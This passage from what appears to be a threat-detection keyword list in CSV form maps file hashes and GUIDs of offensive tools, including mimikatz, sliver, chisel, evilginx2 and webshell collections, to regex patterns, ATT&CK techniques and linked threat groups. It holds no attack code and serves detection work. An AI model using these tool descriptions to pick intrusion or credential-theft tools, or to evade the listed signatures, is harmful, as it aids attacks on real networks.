Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","0","#filehash","N/A","8","2","124","22","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z","25097" "*3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9*",".{0,1000}3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#filehash #linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","25100" "*3d77766aee0c6991e73b44c34c3014b25e1c0730e89e593c53f4f846ca0bd40d*",".{0,1000}3d77766aee0c6991e73b44c34c3014b25e1c0730e89e593c53f4f846ca0bd40d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25101" 
"*3d86ecb9e14e7d1a86e16fa28b61fed96ca5bb9dccbfc1c2f8d1231325755ef1*",".{0,1000}3d86ecb9e14e7d1a86e16fa28b61fed96ca5bb9dccbfc1c2f8d1231325755ef1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25103" "*3d99d90feac8540dcb9639318d5e3ef96726b11f58d418d08023117ff7fcd9fc*",".{0,1000}3d99d90feac8540dcb9639318d5e3ef96726b11f58d418d08023117ff7fcd9fc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25104" "*3d9b9f20cf22e17016d2e46bbf85f4e1dbb605959e8ed288bac7daf67cbff731*",".{0,1000}3d9b9f20cf22e17016d2e46bbf85f4e1dbb605959e8ed288bac7daf67cbff731.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25105" "*3D9D679D-6052-4C5E-BD91-2BC3DED09D0A*",".{0,1000}3D9D679D\-6052\-4C5E\-BD91\-2BC3DED09D0A.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#GUIDproject","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","25106" "*3d9e27be3e47c7e35f0a8b3cc989ec9fe4915f323518fc380a64c080a752a7a7*",".{0,1000}3d9e27be3e47c7e35f0a8b3cc989ec9fe4915f323518fc380a64c080a752a7a7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","25107" "*3da6057398b0a35098b4c4d944bf3df03eda0a05b6383d230e32b49733561a86*",".{0,1000}3da6057398b0a35098b4c4d944bf3df03eda0a05b6383d230e32b49733561a86.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","25109" "*3da905463c66fecfe69d608e98c6cd1defda607d176a73f2b38192a79db3fc65*",".{0,1000}3da905463c66fecfe69d608e98c6cd1defda607d176a73f2b38192a79db3fc65.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","25110" "*3da9c10c87a3f8b9964462299ea2edd92c3b82ed00e412e36a7a4a854b76079c*",".{0,1000}3da9c10c87a3f8b9964462299ea2edd92c3b82ed00e412e36a7a4a854b76079c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25111" "*3daa15880b0da9e659c2f8df0beb56c5a7637e8a96cfe1a4b171358b4370b4f0*",".{0,1000}3daa15880b0da9e659c2f8df0beb56c5a7637e8a96cfe1a4b171358b4370b4f0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25112" 
"*3dac2fe1a99790885eecaee1f0f72d8e06b256b08593aab8945229b5f59efc16*",".{0,1000}3dac2fe1a99790885eecaee1f0f72d8e06b256b08593aab8945229b5f59efc16.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25113" "*3daf3c3717e738b47246b5fb7106b8b62e374ffc79a1f824eb5aaaec2fbdc27c*",".{0,1000}3daf3c3717e738b47246b5fb7106b8b62e374ffc79a1f824eb5aaaec2fbdc27c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25114" "*3db74ea470a886d624947d5e8cdc9a5edeba429ddf39b1cf54801b7d5ec53137*",".{0,1000}3db74ea470a886d624947d5e8cdc9a5edeba429ddf39b1cf54801b7d5ec53137.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25116" "*3db93e0b8f7b39335bfa3f1712a38b8f0e21210772eec85524941e420e9e58ff*",".{0,1000}3db93e0b8f7b39335bfa3f1712a38b8f0e21210772eec85524941e420e9e58ff.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","25117" "*3dc271adc2565c38eda5fdaee3070bda8962159d17ba625467a0f3a6e5e440d0*",".{0,1000}3dc271adc2565c38eda5fdaee3070bda8962159d17ba625467a0f3a6e5e440d0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25118" "*3dc7e0f43e9ebe086c137fa1af3bf410c3d566f1edbceeea7ea5e19d1f9ab5b8*",".{0,1000}3dc7e0f43e9ebe086c137fa1af3bf410c3d566f1edbceeea7ea5e19d1f9ab5b8.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","25120" "*3dca957edf214b435721c18bbacef52a660d618150453589bd95631eb92b5cc8*",".{0,1000}3dca957edf214b435721c18bbacef52a660d618150453589bd95631eb92b5cc8.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","25121" "*3df5882d88914a064cbba240e1b3615c69c432f807f949a80d0d4b5a9f44ef77*",".{0,1000}3df5882d88914a064cbba240e1b3615c69c432f807f949a80d0d4b5a9f44ef77.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - 
T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","#filehash","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","25128" "*3e02ce91331011e03e8de89723c52367ff14d75f7f81b94ad3741f9cc56c5736*",".{0,1000}3e02ce91331011e03e8de89723c52367ff14d75f7f81b94ad3741f9cc56c5736.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25129" "*3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a*",".{0,1000}3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25135" "*3e3092fdc0f518823e6cdbff46f7ad327bee6bca9477a826279c7a76bffa7bce*",".{0,1000}3e3092fdc0f518823e6cdbff46f7ad327bee6bca9477a826279c7a76bffa7bce.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25136" 
"*3e3956052088b12e9fca1e9a209c00e8e60f5bba79bc09881316c83758a93c1d*",".{0,1000}3e3956052088b12e9fca1e9a209c00e8e60f5bba79bc09881316c83758a93c1d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25137" "*3e3956052088b12e9fca1e9a209c00e8e60f5bba79bc09881316c83758a93c1d*",".{0,1000}3e3956052088b12e9fca1e9a209c00e8e60f5bba79bc09881316c83758a93c1d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25138" "*3e3b1b12a07d9b39b6c361763d64a882b91d8f73f207b061b8e2498ecfc9c982*",".{0,1000}3e3b1b12a07d9b39b6c361763d64a882b91d8f73f207b061b8e2498ecfc9c982.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25140" "*3e3b34ad2eaa319676168ff54b63f3219c517cbd50c3df43b2fb4cfe141b5ab2*",".{0,1000}3e3b34ad2eaa319676168ff54b63f3219c517cbd50c3df43b2fb4cfe141b5ab2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","25141" "*3e3e74bdc2c23c8b8e6d177588d7d4d371f63b10aec638126c8ecb117579ba11*",".{0,1000}3e3e74bdc2c23c8b8e6d177588d7d4d371f63b10aec638126c8ecb117579ba11.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 
- T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25143" "*3e3fcf025697ee80f044716eee053848*",".{0,1000}3e3fcf025697ee80f044716eee053848.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","25144" "*3e43822dce57d12ca13a1888e2b5d653dfbf9815dd5cda87e1fc1ce29a423170*",".{0,1000}3e43822dce57d12ca13a1888e2b5d653dfbf9815dd5cda87e1fc1ce29a423170.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","25146" "*3e451b530ade34ae48f51aebf8db1609272ea8d1b1438cfa7c3d570e91b39bd9*",".{0,1000}3e451b530ade34ae48f51aebf8db1609272ea8d1b1438cfa7c3d570e91b39bd9.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","25147" "*3e475ed049ac5a398735ed67e51fc74e6da81238cb09f0bc1cf0e60d50c37f3d*",".{0,1000}3e475ed049ac5a398735ed67e51fc74e6da81238cb09f0bc1cf0e60d50c37f3d.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory 
execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","#filehash","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","25148" "*3e55d1d13465cb7e706efa6d4ddf120b35200d694c619889de3d3190236e780a*",".{0,1000}3e55d1d13465cb7e706efa6d4ddf120b35200d694c619889de3d3190236e780a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25149" "*3e5eb4425abfdce29a04e04cea468e032ad8c0af5a904681f05d9f2e5a4d31a5*",".{0,1000}3e5eb4425abfdce29a04e04cea468e032ad8c0af5a904681f05d9f2e5a4d31a5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25150" "*3e5f5be55582286c2411062a932d31f3c5b6d489c6e2927525bef92c34083e89*",".{0,1000}3e5f5be55582286c2411062a932d31f3c5b6d489c6e2927525bef92c34083e89.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25151" "*3e667715625410352da4236f16184e38c442b2af48fd6f8899b954578c974c8b*",".{0,1000}3e667715625410352da4236f16184e38c442b2af48fd6f8899b954578c974c8b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - 
EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25154" "*3e6740a3e67c207dc53df0daf1c5717def2b267119c75ff0cf6e36585efc332a*",".{0,1000}3e6740a3e67c207dc53df0daf1c5717def2b267119c75ff0cf6e36585efc332a.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","#filehash","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","25155" "*3e6db66b8d4aecf07f084a1fe53d66d437b800fe773476154c78df0c78d1e6a2*",".{0,1000}3e6db66b8d4aecf07f084a1fe53d66d437b800fe773476154c78df0c78d1e6a2.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25157" "*3e6e443b0055c7aca76387e9c557976887ecb6bc342185e52d514503b09a535d*",".{0,1000}3e6e443b0055c7aca76387e9c557976887ecb6bc342185e52d514503b09a535d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25158" "*3e6ea66956ca27686fdb0b1a7fa1a86ddec39e72aa892958bf9f3b4c5dbce7df*",".{0,1000}3e6ea66956ca27686fdb0b1a7fa1a86ddec39e72aa892958bf9f3b4c5dbce7df.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25159" "*3e7c6abf54cf667239605c72fc13e5ae4be53e65ca83887510362a33a7115a0d*",".{0,1000}3e7c6abf54cf667239605c72fc13e5ae4be53e65ca83887510362a33a7115a0d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25162" "*3e829ec96d65a4bc7c962b997c0363ac690ee3206a413980cc7bb8d300c8a3bc*",".{0,1000}3e829ec96d65a4bc7c962b997c0363ac690ee3206a413980cc7bb8d300c8a3bc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25165" "*3e86bf634c4f10502b64f39dba0990e9357ff141d61020b76dd2f3514f02910e*",".{0,1000}3e86bf634c4f10502b64f39dba0990e9357ff141d61020b76dd2f3514f02910e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25166" "*3e8b305a4b6157e6f3ed492c596cfda37d27bf63e1532516aa96ec10eed3d166*",".{0,1000}3e8b305a4b6157e6f3ed492c596cfda37d27bf63e1532516aa96ec10eed3d166.{0,1000}","offensive_tool_keyword","TinyMet","meterpreter stager","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","CL0P - FIN7 - FIN11 - Silence group - GOLD EVERGREEN","C2","https://github.com/SherifEldeeb/TinyMet","1","0","#filehash","N/A","10","10","128","43","2019-08-20T04:39:22Z","2014-05-17T13:31:55Z","25168" "*3e93d23c966b89a3e15719d482d61cb107eb12085cbace1a6453286decea13c1*",".{0,1000}3e93d23c966b89a3e15719d482d61cb107eb12085cbace1a6453286decea13c1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25169" "*3e95f084c11e971e4b30805e59d4cef87b5698ba21ce72b8a228b4e33c069754*",".{0,1000}3e95f084c11e971e4b30805e59d4cef87b5698ba21ce72b8a228b4e33c069754.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25171" "*3e9a7fc50639f2077028d5cfd6ffeba037d03608f30af50cafc12a43d0a4a5e2*",".{0,1000}3e9a7fc50639f2077028d5cfd6ffeba037d03608f30af50cafc12a43d0a4a5e2.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
